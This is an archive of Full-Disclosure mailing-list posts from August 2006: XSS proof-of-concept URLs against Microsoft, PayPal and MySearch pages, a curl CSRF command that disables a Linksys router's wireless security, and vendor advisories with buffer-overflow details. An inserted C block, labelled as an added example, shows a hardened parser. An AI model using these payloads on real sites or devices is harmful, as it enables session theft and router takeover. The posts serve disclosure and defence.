[Full-disclosure] Re: AOL data being mirrored everywhere

2006-08-08 Thread Mike M
Are you n3td3v?? Why all the [EMAIL PROTECTED]@?? he could sue you.

Date: Mon, 07 Aug 2006 10:49:20 -0700
From: kaiser scapegoat [EMAIL PROTECTED]

Hi, all -

AOL released data for 500,000 out in the wild for 500,000:
http://tinyurl.com/ky6ek

Since it has been widely mirrored, AOL will next find a scapegoat so the
public will be more worried about those villains that dared to point out the
problem and mirror the evidence.

Here is the instant recipe:

1) PR department reaches out to their media contacts. Journalists then tell
sensationalist story of hackers or bloggers who mirrored *your* private
data. AOL worms out of responsibility for letting the data loose in the
first place by declaring war on the evil bloggers.

2) Now that there's no public support for the blogger, AOL can safely trick
a government agency into publicly denouncing the blogger. Since the blogger
is clearly a danger to public safety, the government is allowed to ignore
all applicable law. After all their heart was in the right place, and that
matters more than an individual's rights. Also, since the press is already
committed to portraying the blogger as a villain, the government knows that
they will never have to apologize if they make a mistake. The press has a
vested interest not to report the error.

3) Next AOL's team of corporate lawyers will file a lawsuit. It doesn't
matter if the lawsuit is frivolous - they are after the PR value of
prosecuting on behalf of the public, and reinforcing to the media that the
blogger who dared link to the info is the evil one. If the blogger is poor,
weak, and has no media platform of their own, then AOL might actually win
the lawsuit by default, adding further legitimacy to their public defender
posture.

4) The public doesn't understand that killing the messenger only guarantees
successful cover ups in the future. And as far as I can tell, they don't
care that there is a layer of people who corporations can calculate as
having no Constitutional rights in this country (if a person can't defend
their rights, they might as well not exist). AOL's issues management team
is weaving these assumptions into their strategy.

Scapegoating worked for Kaiser Permanente. It'll work for AOL.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: micosoft.com xss

2006-08-08 Thread Thomas Pollet
On 08/08/06, Mad World [EMAIL PROTECTED] wrote:
  Why do you need it ?
  You already discovered xss, the rest of job is just matter of technique.
  I think majority of xss submitters here could do it by various means.
  M$ is lost in its own complexity of how to do simple things.
  If you could ever give me reasonable answer for why do you need this $hit - I could give you the rest, like others could.

I doubt you actually tried getting js executed on page load (for some reason they try to prevent xss in a number of ways).
I did try and didn't succeed, that's why I ask.

Greets,
Thomas

[Full-disclosure] microsoft.com xss #2

2006-08-08 Thread Thomas Pollet
Hello,

for what it's worth..

http://forums.microsoft.com/MSDN/Search/Search.aspx?words=mslocalechoice=9SiteID=1searchscope='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EForumID=45

Greets,
Thomas

[Full-disclosure] mysearch.myway.com XSS

2006-08-08 Thread codeslag
HAI GAIS!

http://mysearch.myway.com/jsp/GGmain.jsp?searchfor=%3Cimg%20src%3D%22http%3A//0xdeadface.co.uk/richard.jpg%22/%3E

Hugs & Kisses
dyn0/codeslag

Re: [Full-disclosure] Re: micosoft.com xss

2006-08-08 Thread Mad World
Good morning !

You can doubt, it's your right to do so.
Wanna bet ?
Just open your eyes and your nose will show you that you are actually breaking 
silly structure of page in more than one place ..
It's relatively easy using the same exact place of code you tried to make it.
I have working example, it is based on other microsoft features as well.

Greets,
- Mad World

--- [EMAIL PROTECTED] wrote:

From: Thomas Pollet [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Re: micosoft.com xss
Date: Tue, 8 Aug 2006 10:18:56 +0200

On 08/08/06, Mad World [EMAIL PROTECTED] wrote:

  Why do you need it ?
  You already discovered xss, the rest of job is just matter
  of technique.
  I  think  majority  of  xss  submitters  here could do it by
  various means.
  M$ is lost in its own complexity of how to do simple things.
  If  you  could ever give me reasonable answer for why do you
  need  this  $hit  - I could give you the rest, like others
  could.

I  doubt  you  actually  tried getting js executed on page load
(for some reason they try to prevent xss in a number of ways).
I did try and didn't succeed, that's why I ask.
Greets,
Thomas



_
Visit Thailand @ http://www.sawadee.com
Websearch and email: DNSASIA.com   FAST!
128k dialup: login.samuinet.com



Re: [Full-disclosure] Attacking the local LAN via XSS

2006-08-08 Thread Dude VanWinkle

On 8/7/06, Nikolay Kubarelov [EMAIL PROTECTED] wrote:

On Friday 04 August 2006 16:06, pdp (architect) wrote:
 IMHO, if you want to do stuff on lower level, you need to think of
 something else. JavaScript, Flash and Java Applets are technologies
 that are designed to run on the WEB. This is why, IMHO, they are quite
 good platform for performing WEB/HTTP based attacks.

OK, I'm really interested what are those login web pages with default password
for admin:password I see all my network. I bet there are more than 10%
routers with open http ports.
I can attach snapshots if you buy me a beer.

The question is where is the xss bug on major http admin panels.


Does this count?


From an earlier post by GinsuRabbit:


I. DESCRIPTION

Tested product: Linksys WRT54g home router, firmware revision 1.00.9.

Problem #1: No password validation for configuration settings.

The WRT54g does not attempt to verify a username and password when
configuration settings are being changed.  If you wish to read configuration
settings, you must provide the administrator ID and password via HTTP basic
authentication.  No similar check is done for configuration changes.

This request results in a user-id and password prompt:
GET /wireless.htm

This request disables wireless security on the router, with no password
prompt:
POST /Security.tri
Content-Length: 24

SecurityMode=0&layout=en

Problem #2: Cross-site request forgery

The web administration console does not verify that the request to change
the router configuration is being made with the consent of the
administrator.  Any web site can force a browser to send a request to the
linksys router, and the router will accept the request.


II. Exploitation

The combination of these two bugs means that any internet web site can
change the configuration of your router.  Recently published techniques for
port-scanning and web server fingerprinting via java and javascript make
this even easier.  The attack scenario is as follows:

- intranet user visits a malicious web site
- malicious web site returns specially crafted HTML page
- intranet user's browser automatically sends a request to the router that
enables the remote administration interface
- the owner of the malicious web site now has complete access to your router

I'm not going to share the specially crafted HTML page at this time, but
it isn't all that special.


III. DETECTION

If your router is vulnerable, the following curl command will disable
wireless security on your router.  Tests for other router models and
firmware revisions may be different:

curl -d 'SecurityMode=0&layout=en' http://192.168.0.1/Security.tri


IV. MITIGATION

1) Make sure you've disabled the remote administration feature of your
router.  If you have this feature enabled, anybody on the internet can
take control of the router.

2) Change the IP address of the router to a random value, preferably in the
range assigned to private networks.  For example, change the IP address to
10.x.y.z, where x, y, and z are numbers between 0 and 255 inclusive.  This
makes it more difficult for an attacker to forge the request necessary to
change the router configuration.  This mitigation technique might not help
much if you have a java-enabled browser, because of recently published
techniques for determining gateway addresses via java applets.

3) Disable HTTP access to the administration interface of the router,
allowing only HTTPS access.  Under most circumstances, this will cause the
browser to show a certificate warning before the configuration is changed.



[Full-disclosure] paypal.com xss (was Re: micosoft.com xss)

2006-08-08 Thread Thomas Pollet
Man you suck, codes or stfu.

I know the code is broken in more than 1 place, i tried registering event handlers, exiting jscript etc. etc. time to move on

point is xss is everywhere, trust noone etc. etc.

To make my point clear... last of the [EMAIL PROTECTED]

GET https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: https://www.paypal.com/cgi-bin/webscr?cmd=_help-extsource_page=_profile-comparison;alert(xss);var%20f=

results in

script type=text/javascript
!--
/* SiteCatalyst Variables */
s.pageName=SignUp:Landing Page;
s.prop11=general/SignupInitial.xsl::_registration-run::0;
s.channel=Sign Up:Landing Page;
s.r=https://www.paypal.com/cgi-bin/webscr?cmd=_help-extamp;source_page=_profile-comparison;alert(xss);var%20f=;
s.prop7=Unknown;
s.prop8=Unknown;
s.prop9=Unknown;
s.prop10=US;
s.prop12=Unknown;
s.visitorSampling= 20;
/* DO NOT ALTER ANYTHING BELOW THIS LINE ! **/
var s_code=s.t();if(s_code)document.write(s_code) // --
/script

in other words referer url isn't correctly cleaned for paypal registration page and used for js var.

poc: go to
https://www.paypal.com/cgi-bin/webscr?cmd=_help-extsource_page=_profile-comparison;alert(xss);s.r=
and click on the sign up link

Have a nice life, die soon,
Thomas

On 08/08/06, Mad World [EMAIL PROTECTED] wrote:
Good morning !

You can doubt, it's your right to do so.
Wanna bet ?
Just open your eyes and your nose will show you that you are actually breaking
silly structure of page in more than one place ..
It's relatively easy using the same exact place of code you tried to make it.
I have working example, it is based on other microsoft features as well.

Greets,
- Mad World

--- [EMAIL PROTECTED] wrote:

From: Thomas Pollet [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Re: micosoft.com xss
Date: Tue, 8 Aug 2006 10:18:56 +0200

On 08/08/06, Mad World [EMAIL PROTECTED] wrote:

  Why do you need it ?
  You already discovered xss, the rest of job is just matter
  of technique.
  I think majority of xss submitters here could do it by
  various means.
  M$ is lost in its own complexity of how to do simple things.
  If you could ever give me reasonable answer for why do you
  need this $hit - I could give you the rest, like others
  could.

I doubt you actually tried getting js executed on page load
(for some reason they try to prevent xss in a number of ways).
I did try and didn't succeed, that's why I ask.
Greets,
Thomas

_
Visit Thailand @ http://www.sawadee.com
Websearch and email: DNSASIA.com FAST!
128k dialup: login.samuinet.com

Re: [Full-disclosure] Re: micosoft.com xss

2006-08-08 Thread Mad World
For such words you could eat your hat if I would like to go in public.
It's a last time i am teaching script kiddies for something beyond their 
understanding.
I would like that you have at least small area in your brains that restricts 
your tongue.
If you wouldn't be script kiddie you would take your words back and learn 
instead.
Yesterdays code is here:

http://support.microsoft.com/newsgroups/default.aspx?lang=encr=USdg=microsoft.public.ccfsloc=us%27%29%22%20st%79le%3d%22co%6cor%3aex%70ress%69on%28ale%72t%28String.fromCharCode%280x004d%29%2bString.fromCharCode%280x0069%29%2bString.fromCharCode%280x0063%29%2bString.fromCharCode%280x0072%29%2bString.fromCharCode%280x006f%29%2bString.fromCharCode%280x002c%29%2bString.fromCharCode%280x0073%29%2bString.fromCharCode%280x006f%29%2bString.fromCharCode%280x0066%29%2bString.fromCharCode%280x0074%29%2bString.fromCharCode%280x0020%29%2bString.fromCharCode%280x003a%29%2bString.fromCharCode%280x0020%29%2bString.fromCharCode%280x0069%29%2bString.fromCharCode%280x006d%29%2bString.fromCharCode%280x0070%29%2bString.fromCharCode%280x006f%29%2bString.fromCharCode%280x0074%29%2bString.fromCharCode%280x0065%29%2bString.fromCharCode%280x006e%29%2bString.fromCharCode%280x0074%29%2bString.fromCharCode%280x0020%29%2bString.fromCharCode%280x0021%29%29%29%22%20a%3d%22%5c%22%29

Learn,learn,learn (of course if you will have enough skills to handle your 
browser after that).

Greets,
Mad World.

--- [EMAIL PROTECTED] wrote:

Man you suck, codes or stfu.

I know the code is broken in more than 1 place, i tried registering event 
handlers, exiting jscript etc. etc. time to move on

point is xss is everywhere, trust noone etc. etc. 

To make my point clear... last of the [EMAIL PROTECTED]

GET https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/msword, application/x-shockwave-flash, application/vnd.ms-excel, 
application/vnd.ms-powerpoint, */* 
Referer: 
https://www.paypal.com/cgi-bin/webscr?cmd=_help-extsource_page=_profile-comparison;alert(xss);var%20f=
 



results in


script type=text/javascript
!--
/* SiteCatalyst Variables */
s.pageName=SignUp:Landing Page;
s.prop11=general/SignupInitial.xsl::_registration-run::0; 
s.channel=Sign Up:Landing Page;
s.r=https://www.paypal.com/cgi-bin/webscr?cmd=_help-extamp;source_page=_profile-comparison
 ;alert(xss);var%20f=;
s.prop7=Unknown;
s.prop8=Unknown;
s.prop9=Unknown;
s.prop10=US;
s.prop12=Unknown;
s.visitorSampling= 20;
/* DO NOT ALTER ANYTHING BELOW THIS LINE ! **/
var s_code=s.t();if(s_code)document.write(s_code) // --
/script

in other words referer url isn't correctly cleaned for paypal registration 
page and used for js var. 
poc: go to
https://www.paypal.com/cgi-bin/webscr?cmd=_help-extsource_page=_profile-comparison;alert(xss);s.r=
 

and click on the sign up link

Have a nice life, die soon,
Thomas


On 08/08/06, Mad World [EMAIL PROTECTED] wrote: 
Good morning !

You can doubt, it's your right to do so.
Wanna bet ?
Just open your eyes and your nose will show you that you are actually breaking 
silly structure of page in more than one place .. 
It's relatively easy using the same exact place of code you tried to make it.
I have working example, it is based on other microsoft features as well.

Greets,
- Mad World

--- [EMAIL PROTECTED] wrote:

From: Thomas Pollet [EMAIL PROTECTED]
To: [EMAIL PROTECTED] 
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Re: micosoft.com xss
Date: Tue, 8 Aug 2006 10:18:56 +0200 

On 08/08/06, Mad World [EMAIL PROTECTED] wrote:

  Why do you need it ?
  You already discovered xss, the rest of job is just matter
  of technique. 
  I  think  majority  of  xss  submitters  here could do it by
  various means.
  M$ is lost in its own complexity of how to do simple things.
  If  you  could ever give me reasonable answer for why do you
  need  this  $hit  - I could give you the rest, like others
  could.

I  doubt  you  actually  tried getting js executed on page load
(for some reason they try to prevent xss in a number of ways). 
I did try and didn't succeed, that's why I ask.
Greets,
Thomas



_
Visit Thailand @ http://www.sawadee.com 
Websearch and email: DNSASIA.com   FAST!
128k dialup: login.samuinet.com



[Full-disclosure] TSRT-06-07: eIQnetworks Enterprise Security Analyzer Monitoring Agent Buffer Overflow Vulnerabilities

2006-08-08 Thread TSRT
TSRT-06-07: eIQnetworks Enterprise Security Analyzer Monitoring Agent
Buffer Overflow Vulnerabilities

http://www.tippingpoint.com/security/advisories/TSRT-06-07.html
August 8, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
Enterprise Security Analyzer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since July 31, 2006 by Digital Vaccine protection
filter ID 4386. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
These vulnerabilities allow remote attackers to execute arbitrary code
on vulnerable installations of eIQnetworks Enterprise Security
Analyzer. Authentication is not required to exploit these
vulnerabilities.

The first flaw specifically exists within the routines responsible for
handling user-supplied data on TCP port  within Monitoring.exe.
Upon connecting to this port the user is immediately prompted for a
password. A custom string comparison loop is used to validate the
supplied password against the hard-coded value eiq2esa?, where the
question mark represents any alpha-numeric character. Issuing the
command HELP reveals a number of documented commands:

   -
   Usage:
   QUERYMONITOR: to fetch events for a particular monitor
   QUERYMONITORusermonidtimer
   QUERYEVENTCOUNT or QEC: to get latest event counts
   RESETEVENTCOUNT or REC: to reset event counts
   REC[ALL] or RECdev1,dev2,
   STATUS: Display the running status of all the threads
   TRACE:  TRACEip or hostname.  TRACEOFF will turn off the trace
   FLUSH: reset monitors as though the hour has changed
   ALRT-OFF and ALRT-ON: toggle the life of alerts-thread.
   RECV-OFF and RECV-ON: toggle the life of event-collection thread.
   EM-OFF and EM-ON toggle event manager
   DMON-OFF and DMON-ON toggle device event monitoring
   HMON-OFF and HMON-ON toggle host event monitoring
   NFMON-OFF and NFMON-ON toggle netflow event monitoring
   HPMON-OFF and HPMON-ON toggle host perf monitoring
   X or EXIT: to close the session
   -

Supplying a long string to the TRACE command results in an overflow of
the global variable at 0x004B1788. A neighboring global variable, 116
bytes after the overflowed variable, contains a file output stream
pointer that is written to every 30 seconds by a garbage collection
thread. The log message can be influenced and therefore this is a valid
exploit vector, albeit complicated. A trivial exploit vector exists
within the parsing of the actual command at the following equivalent
API call:

sscanf(socket_data, %[^]%[^], 60_byte_stack_var, global_var);

Because no explicit check is made for the exact command TRACE, an
attacker can abuse this call to sscanf by passing a long suffix to the
TRACE command that is free of the field terminating character, ''.
This vector is trivial to exploit.

The second flaw specifically exists within the routines responsible for
handling user-supplied data on TCP port 10626 within Monitoring.exe. The
service will accept up to approximately 16K of data from unauthenticated
clients which is later parsed, in a similar fashion to above, in search
of the delimiting character ''. Various trivial vectors of
exploitation exist, for example, through the QUERYMONITOR command.

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More
details can be found at:

http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
2006.07.31 - Digital Vaccine released to TippingPoint customers
2006.08.08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Pedram Amini, TippingPoint Security
Research Team.

-- About the TippingPoint Security Research Team (TSRT):
The TippingPoint Security Research Team (TSRT) consists of industry
recognized security researchers that apply their cutting-edge
engineering, reverse engineering and analysis talents in our daily
operations. More information about the team is available at:

http://www.tippingpoint.com/security
 
The by-product of these efforts fuels the creation of vulnerability
filters that are automatically delivered to our customers' intrusion
prevention systems through the Digital Vaccine(R) service.

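Added example, not eIQnetworks code and not from the advisory: the bounded form of the parser the advisory describes as the equivalent sscanf call. It assumes '&' as the delimiter character (lost from the page), a 60-byte command buffer as the advisory states, and an argument buffer size chosen here; it rejects a TRACE line with a long suffix and no delimiter instead of writing past the stack buffer, and matches the command exactly against the HELP table quoted above.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not eIQnetworks code. The advisory gives the Monitoring.exe
 * parser as the equivalent of sscanf(socket_data, "%[^?]%[^?]", 60_byte_stack_var,
 * global_var) with the delimiter lost from the page; '&' is ASSUMED here. With
 * no maximum width on %[...], a command longer than the 60-byte stack buffer
 * that contains no delimiter is written past the end of that buffer. */

#define CMD_SZ 60    /* size of the stack variable named in the advisory */
#define ARG_SZ 256   /* ASSUMED size of the argument buffer */

/* Documented commands, taken from the HELP output quoted in the advisory. */
static const char *const known_commands[] = {
    "QUERYMONITOR", "QUERYEVENTCOUNT", "QEC", "RESETEVENTCOUNT", "REC",
    "STATUS", "TRACE", "TRACEOFF", "FLUSH", "ALRT-OFF", "ALRT-ON",
    "RECV-OFF", "RECV-ON", "EM-OFF", "EM-ON", "DMON-OFF", "DMON-ON",
    "HMON-OFF", "HMON-ON", "NFMON-OFF", "NFMON-ON", "HPMON-OFF", "HPMON-ON",
    "X", "EXIT", NULL
};

/* Exact-match lookup: the advisory notes the original never checked for the
 * exact command "TRACE", so "TRACE" plus any suffix reached the scan. */
int is_known_command(const char *cmd)
{
    size_t i;
    for (i = 0; known_commands[i] != NULL; i++)
        if (strcmp(cmd, known_commands[i]) == 0)
            return 1;
    return 0;
}

/* Hardened parser. Each field width is the real buffer size minus one (room
 * for the NUL), so sscanf can never write past a buffer. %n records the bytes
 * consumed: if the byte after a field is neither '&' nor the end of the line,
 * the width stopped the scan rather than the delimiter, and the over-long
 * field is rejected instead of silently truncated. 0 on success, -1 on bad input. */
int parse_command_bounded(const char *socket_data,
                          char *cmd, size_t cmdsz, char *arg, size_t argsz)
{
    char fmt[32];
    const char *rest;
    int n = 0;
    if (socket_data == NULL || cmdsz < 2 || argsz < 2)
        return -1;
    cmd[0] = '\0';
    arg[0] = '\0';
    snprintf(fmt, sizeof fmt, "%%%zu[^&]%%n", cmdsz - 1);  /* "%59[^&]%n" */
    if (sscanf(socket_data, fmt, cmd, &n) != 1)
        return -1;                       /* empty line or leading '&' */
    if (socket_data[n] == '\0')
        return 0;                        /* bare command such as STATUS */
    if (socket_data[n] != '&')
        return -1;                       /* command longer than the buffer */
    rest = socket_data + n + 1;
    n = 0;
    snprintf(fmt, sizeof fmt, "%%%zu[^&]%%n", argsz - 1);
    if (sscanf(rest, fmt, arg, &n) != 1)
        return -1;                       /* "TRACE&" with nothing after it */
    if (rest[n] != '\0' && rest[n] != '&')
        return -1;                       /* argument longer than the buffer */
    return 0;
}

/* One line from the socket: bounded parse, then exact command lookup.
 * Returns 0 if the line is acceptable, -1 otherwise. */
int handle_socket_line(const char *socket_data, char *cmd, size_t cmdsz,
                       char *arg, size_t argsz)
{
    if (parse_command_bounded(socket_data, cmd, cmdsz, arg, argsz) != 0)
        return -1;
    return is_known_command(cmd) ? 0 : -1;
}

/* Wrapper with the buffer sizes above. */
int check_line(const char *line)
{
    char cmd[CMD_SZ], arg[ARG_SZ];
    return handle_socket_line(line, cmd, sizeof cmd, arg, sizeof arg);
}

/* Constructed input matching the advisory's vector: "TRACE" followed by
 * suffix_len bytes of 'A' and no delimiter anywhere (capped to the local buffer). */
int check_long_trace(size_t suffix_len)
{
    char line[512];
    if (suffix_len > sizeof line - 6)
        suffix_len = sizeof line - 6;
    memcpy(line, "TRACE", 5);
    memset(line + 5, 'A', suffix_len);
    line[5 + suffix_len] = '\0';
    return check_line(line);
}

int main(void)
{
    printf("TRACE&10.0.0.1 -> %d, STATUS -> %d, TRACE+200xA -> %d\n",
           check_line("TRACE&10.0.0.1"), check_line("STATUS"), check_long_trace(200));
    return 0;
}
```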


[Full-disclosure] ZDI-06-026: Microsoft Internet Explorer Multiple CSS Imports Memory Corruption Vulnerability

2006-08-08 Thread zdi-disclosures
ZDI-06-026: Microsoft Internet Explorer Multiple CSS Imports Memory
   Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-026.html
August  8, 2006

-- CVE ID:
CVE-2006-3451

-- Affected Vendor:
Microsoft

-- Affected Products:
Internet Explorer 6 All Versions
Internet Explorer 5 SP4

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since August  8, 2006 by Digital Vaccine protection
filter ID 4606. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User
interaction is required to exploit this vulnerability in that the
target must visit a malicious page.
 
 
The specific flaw exists due to improper garbage collection when
multiple imports are used on a styleSheets collection. Crafting a
long chain of CSS imports in an HTML document results in a memory
corruption eventually leading to code execution.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/MS06-042.mspx

-- Disclosure Timeline:
2006.06.14 - Vulnerability reported to vendor
2006.08.08 - Digital Vaccine released to TippingPoint customers
2006.08.08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Sam Thomas.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.



[Full-disclosure] ERRATA: [ GLSA 200608-08 ] GnuPG: Integer overflow vulnerability

2006-08-08 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory [ERRATA UPDATE]          GLSA 200608-08:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: GnuPG: Integer overflow vulnerability
      Date: August 05, 2006
   Updated: August 08, 2006
      Bugs: #142248
        ID: 200608-08:02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Errata
======

The Resolution proposed in the original version of this Security Advisory did
not correctly address the issue for users who also have GnuPG 1.9 installed.

The corrected sections appear below.

Resolution
==========

All GnuPG users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =app-crypt/gnupg-1.4*

References
==========

  [ 1 ] CVE-2006-3746
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3746

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200608-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] TSRT-06-08: Microsoft Internet Help COM Object Memory Corruption Vulnerability

2006-08-08 Thread TSRT
TSRT-06-08: Microsoft Internet Help COM Object Memory Corruption
Vulnerability

http://www.tippingpoint.com/security/advisories/TSRT-06-08.html
August 8, 2006

-- CVE ID:
CVE-2006-3357

-- Affected Vendor:
Microsoft

-- Affected Products:
Microsoft Windows Server 2003 SP1 and SP2
Microsoft Windows XP SP1 and SP2
Microsoft Windows 2000 Service Pack 4

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since August 8, 2006 by Digital Vaccine protection
filter ID 4581. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User
interaction is required to exploit this vulnerability in that the
target must visit a malicious page.

The specific vulnerability can lead to code execution when
instantiating the Internet.HHCtrl COM object through Internet Explorer.
The flaw exists due to invalid freeing of heap memory when several calls
to the Image property of the ActiveX control are performed. By abusing
the jscript.dll CScriptBody::Release() function user supplied data can
be executed.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/MS06-046.mspx

-- Disclosure Timeline:
2006.04.27 - Vulnerability reported to vendor
2006.08.08 - Digital Vaccine released to TippingPoint customers
2006.08.08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce, TippingPoint Security
Research Team.

-- About the TippingPoint Security Research Team (TSRT):
The TippingPoint Security Research Team (TSRT) consists of industry
recognized security researchers that apply their cutting-edge
engineering, reverse engineering and analysis talents in our daily
operations. More information about the team is available at:

http://www.tippingpoint.com/security
 
The by-product of these efforts fuels the creation of vulnerability
filters that are automatically delivered to our customers' intrusion
prevention systems through the Digital Vaccine(R) service.



[Full-disclosure] TSRT-06-09: Microsoft DirectAnimation COM Object Memory Corruption Vulnerability

2006-08-08 Thread TSRT
TSRT-06-09: Microsoft DirectAnimation COM Object Memory Corruption
Vulnerability

http://www.tippingpoint.com/security/advisories/TSRT-06-09.html
August 8, 2006

-- CVE ID:
CVE-2006-3638

-- Affected Vendor:
Microsoft

-- Affected Products:
Internet Explorer 6 All Versions
Internet Explorer 5 SP4

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since August 8, 2006 by Digital Vaccine protection
filter ID 4593. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Microsoft Internet Explorer. User
interaction is required to exploit this vulnerability in that the
target must visit a malicious page.

The specific flaw exists in the DirectAnimation.DATuple ActiveX control
when improperly calling the Nth() method. By supplying a positive
integer we can control a data reference calculation that is later used
to control execution. The problem is due to the lack of sanity checking
on the index used during a call to TupleNthBvrImpl::GetTypeInfo() in
danim.dll.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/MS06-042.mspx

-- Disclosure Timeline:
2006.04.27 - Vulnerability reported to vendor
2006.08.08 - Digital Vaccine released to TippingPoint customers
2006.08.08 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Cody Pierce, TippingPoint Security
Research Team.

-- About the TippingPoint Security Research Team (TSRT):
The TippingPoint Security Research Team (TSRT) consists of industry
recognized security researchers that apply their cutting-edge
engineering, reverse engineering and analysis talents in our daily
operations. More information about the team is available at:

http://www.tippingpoint.com/security
 
The by-product of these efforts fuels the creation of vulnerability
filters that are automatically delivered to our customers' intrusion
prevention systems through the Digital Vaccine(R) service.



[Full-disclosure] TSRT-06-10: Microsoft HLINK.DLL Hyperlink Object Library Buffer Overflow Vulnerability

2006-08-08 Thread TSRT
TSRT-06-10: Microsoft HLINK.DLL Hyperlink Object Library Buffer
Overflow Vulnerability

http://www.tippingpoint.com/security/advisories/TSRT-06-10.html
August 8, 2006

-- CVE ID:
CVE-2006-3086

-- Affected Vendor:
Microsoft

-- Affected Products:
Microsoft Windows Server 2003 SP1 and SP2
Microsoft Windows XP SP1 and SP2
Microsoft Windows 2000 Service Pack 4

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since August 8, 2006 by Digital Vaccine protection
filter ID 4601. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable applications that utilize Microsoft Hyperlink Component
Object Model (COM) objects. Specifically, this includes at least
Microsoft Word, PowerPoint and Excel. Exploitation over the web is
doable via Office Web Components (OWC). It is not required for the
target to have OWC installed.

The specific flaw exists within HLINK.DLL in the routine
HrShellOpenWithMonikerDisplayName(). The vulnerability is due to an
unchecked WzCopy (wide char string copy) to a stack based buffer from
user-supplied data in the following call chain:

  HLNK_Bsc::OnObjectAvailable
    HLNK::HrCompleteNavigation()
      HLNK::HrShowTarget()
        HrShellOpenWithMonikerDisplayName()

The specific WzCopy() responsible for the overflow is shown in the
following disassembly snippet from HLINK.DLL version 5.2.3790.227 from
Windows XP SP2:

7682DA6B lea eax, [ebp+overflowed_buffer] ; dst
7682DA71 push eax
7682DA72 push [ebp+var_E30]   ; src
7682DA78 call WzCopy(ushort const *,ushort *) ; vulnerable call

The overflowed buffer is at frame pointer offset 0x0E2C, requiring a
3,628 byte write before breaking out of the holding stack frame. Simply
specifying a long URI string will not trigger the vulnerability.
However, by requesting a URI that does a redirect with the HTTP
Location: tag to a long URI, the vulnerable code will be reached, and a
previous call to HrGetFullDisplayName() will pass the long URI to the
vulnerable WzCopy(). The long URI must actually exist, otherwise the
